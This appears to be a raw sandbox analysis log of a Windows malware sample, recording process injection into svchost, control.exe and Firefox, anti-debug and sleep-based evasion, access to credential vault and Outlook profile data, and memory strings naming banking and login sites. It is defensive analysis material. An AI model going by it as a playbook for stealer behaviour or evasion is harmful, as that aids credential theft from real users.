                Source: 5by4QM3v89.exeVirustotal: Detection: 63%
                Source: 5by4QM3v89.exeReversingLabs: Detection: 65%
                Source: unknownProcess created: C:\Users\user\Desktop\5by4QM3v89.exe "C:\Users\user\Desktop\5by4QM3v89.exe"
                Source: C:\Users\user\Desktop\5by4QM3v89.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5by4QM3v89.exe"
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\5by4QM3v89.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5by4QM3v89.exe"Jump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\control.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: 5by4QM3v89.exeStatic file information: File size 1225728 > 1048576
                Source: 5by4QM3v89.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 5by4QM3v89.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 5by4QM3v89.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 5by4QM3v89.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 5by4QM3v89.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 5by4QM3v89.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 5by4QM3v89.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rVnDkmUdXXPrwb.exe, 00000004.00000000.1757884591.0000000000FEE000.00000002.00000001.01000000.00000005.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906924468.0000000000FEE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: 5by4QM3v89.exe, 00000000.00000003.1392160166.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, 5by4QM3v89.exe, 00000000.00000003.1392416522.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729316683.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731560866.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004990000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004B2E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1838640799.000000000463C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1840808432.00000000047E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: control.pdb source: svchost.exe, 00000002.00000003.1806607303.0000000002A3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806469513.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000003.1905177292.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 5by4QM3v89.exe, 00000000.00000003.1392160166.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, 5by4QM3v89.exe, 00000000.00000003.1392416522.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1838546864.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1838546864.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1729316683.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1731560866.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004990000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.2627135812.0000000004B2E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1838640799.000000000463C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1840808432.00000000047E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: control.pdbUGP source: svchost.exe, 00000002.00000003.1806607303.0000000002A3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1806469513.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000003.1905177292.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1907006219.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1907006219.00000000026FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000395FC000.00000004.80000000.00040000.00000000.sdmp
                Source: 5by4QM3v89.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 5by4QM3v89.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 5by4QM3v89.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 5by4QM3v89.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 5by4QM3v89.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00394B37 LoadLibraryA,GetProcAddress,0_2_00394B37
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_0039C508 push A30039BAh; retn 0039h0_2_0039C50D
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B8945 push ecx; ret 0_2_003B8958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026B907E push esp; retf 2_2_026B9080
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026BE83F push esi; ret 2_2_026BE840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026B668B push ss; ret 2_2_026B66A1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026B668F push ss; ret 2_2_026B66A1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026AAE84 push 00000017h; ret 2_2_026AAE8A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A17D0 push edi; ret 2_2_026A17D2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A3480 push eax; ret 2_2_026A3482
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026A4DE2 push edx; retf 2_2_026A4DEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310225F pushad ; ret 2_2_031027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031027FA pushad ; ret 2_2_031027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031309AD push ecx; mov dword ptr [esp], ecx2_2_031309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310283D push eax; iretd 2_2_03102858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310135E push eax; iretd 2_2_03101369
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003948D7
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00415376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00415376
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003B3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003B3187
                Source: C:\Users\user\Desktop\5by4QM3v89.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\5by4QM3v89.exeAPI/Special instruction interceptor: Address: 1318CB4
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8418CD324
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8418CD7E4
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8418CD944
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8418CD504
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8418CD544
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8418CD1E4
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8418D0154
                Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FF8418CDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E rdtsc 2_2_0317096E
                Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 3615Jump to behavior
                Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 6358Jump to behavior
                Source: C:\Users\user\Desktop\5by4QM3v89.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102070
                Source: C:\Users\user\Desktop\5by4QM3v89.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\control.exe TID: 7784Thread sleep count: 3615 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 7784Thread sleep time: -7230000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 7784Thread sleep count: 6358 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\control.exe TID: 7784Thread sleep time: -12716000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe TID: 5872Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003F445A
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FC6D1 FindFirstFileW,FindClose,0_2_003FC6D1
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003FC75C
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003FEF95
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003FF0F2
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003FF3F3
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003F37EF
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003F3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003F3B12
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003FBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003FBCBC
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003949A0
                Source: j29251pK6.5.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: j29251pK6.5.drBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: j29251pK6.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: j29251pK6.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: j29251pK6.5.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: j29251pK6.5.drBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: control.exe, 00000005.00000002.2620545178.0000000002C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                Source: j29251pK6.5.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: j29251pK6.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: j29251pK6.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: j29251pK6.5.drBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: j29251pK6.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: j29251pK6.5.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: j29251pK6.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: j29251pK6.5.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: rVnDkmUdXXPrwb.exe, 00000008.00000002.2623432439.000000000069F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2138033736.000001B0394DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: j29251pK6.5.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: j29251pK6.5.drBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: j29251pK6.5.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: j29251pK6.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: j29251pK6.5.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: j29251pK6.5.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: control.exe, 00000005.00000002.2630210866.0000000007D6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: server_stored_cvcVMwareC
                Source: j29251pK6.5.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: j29251pK6.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: j29251pK6.5.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: j29251pK6.5.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: j29251pK6.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: j29251pK6.5.drBinary or memory string: global block list test formVMware20,11696501413
                Source: j29251pK6.5.drBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: control.exe, 00000005.00000002.2630210866.0000000007D6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareC
                Source: j29251pK6.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: j29251pK6.5.drBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: j29251pK6.5.drBinary or memory string: discord.comVMware20,11696501413f
                Source: j29251pK6.5.drBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\5by4QM3v89.exeAPI call chain: ExitProcess graph end nodegraph_0-101017
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0317096E rdtsc 2_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_026B7883 LdrLoadDll,2_2_026B7883
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00403F09 BlockInput,0_2_00403F09
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00393B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00393B3A
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_003C5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_003C5A7C
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_00394B37 LoadLibraryA,GetProcAddress,0_2_00394B37
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_013178A0 mov eax, dword ptr fs:[00000030h]0_2_013178A0
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_01318F20 mov eax, dword ptr fs:[00000030h]0_2_01318F20
                Source: C:\Users\user\Desktop\5by4QM3v89.exeCode function: 0_2_01318F80 mov eax, dword ptr fs:[00000030h]0_2_01318F80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C310 mov ecx, dword ptr fs:[00000030h]2_2_0312C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03208324 mov eax, dword ptr fs:[00000030h]2_2_03208324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03208324 mov ecx, dword ptr fs:[00000030h]2_2_03208324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03208324 mov eax, dword ptr fs:[00000030h]2_2_03208324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03208324 mov eax, dword ptr fs:[00000030h]2_2_03208324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03150310 mov ecx, dword ptr fs:[00000030h]2_2_03150310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]2_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]2_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A30B mov eax, dword ptr fs:[00000030h]2_2_0316A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov ecx, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B035C mov eax, dword ptr fs:[00000030h]2_2_031B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FA352 mov eax, dword ptr fs:[00000030h]2_2_031FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D8350 mov ecx, dword ptr fs:[00000030h]2_2_031D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B2349 mov eax, dword ptr fs:[00000030h]2_2_031B2349
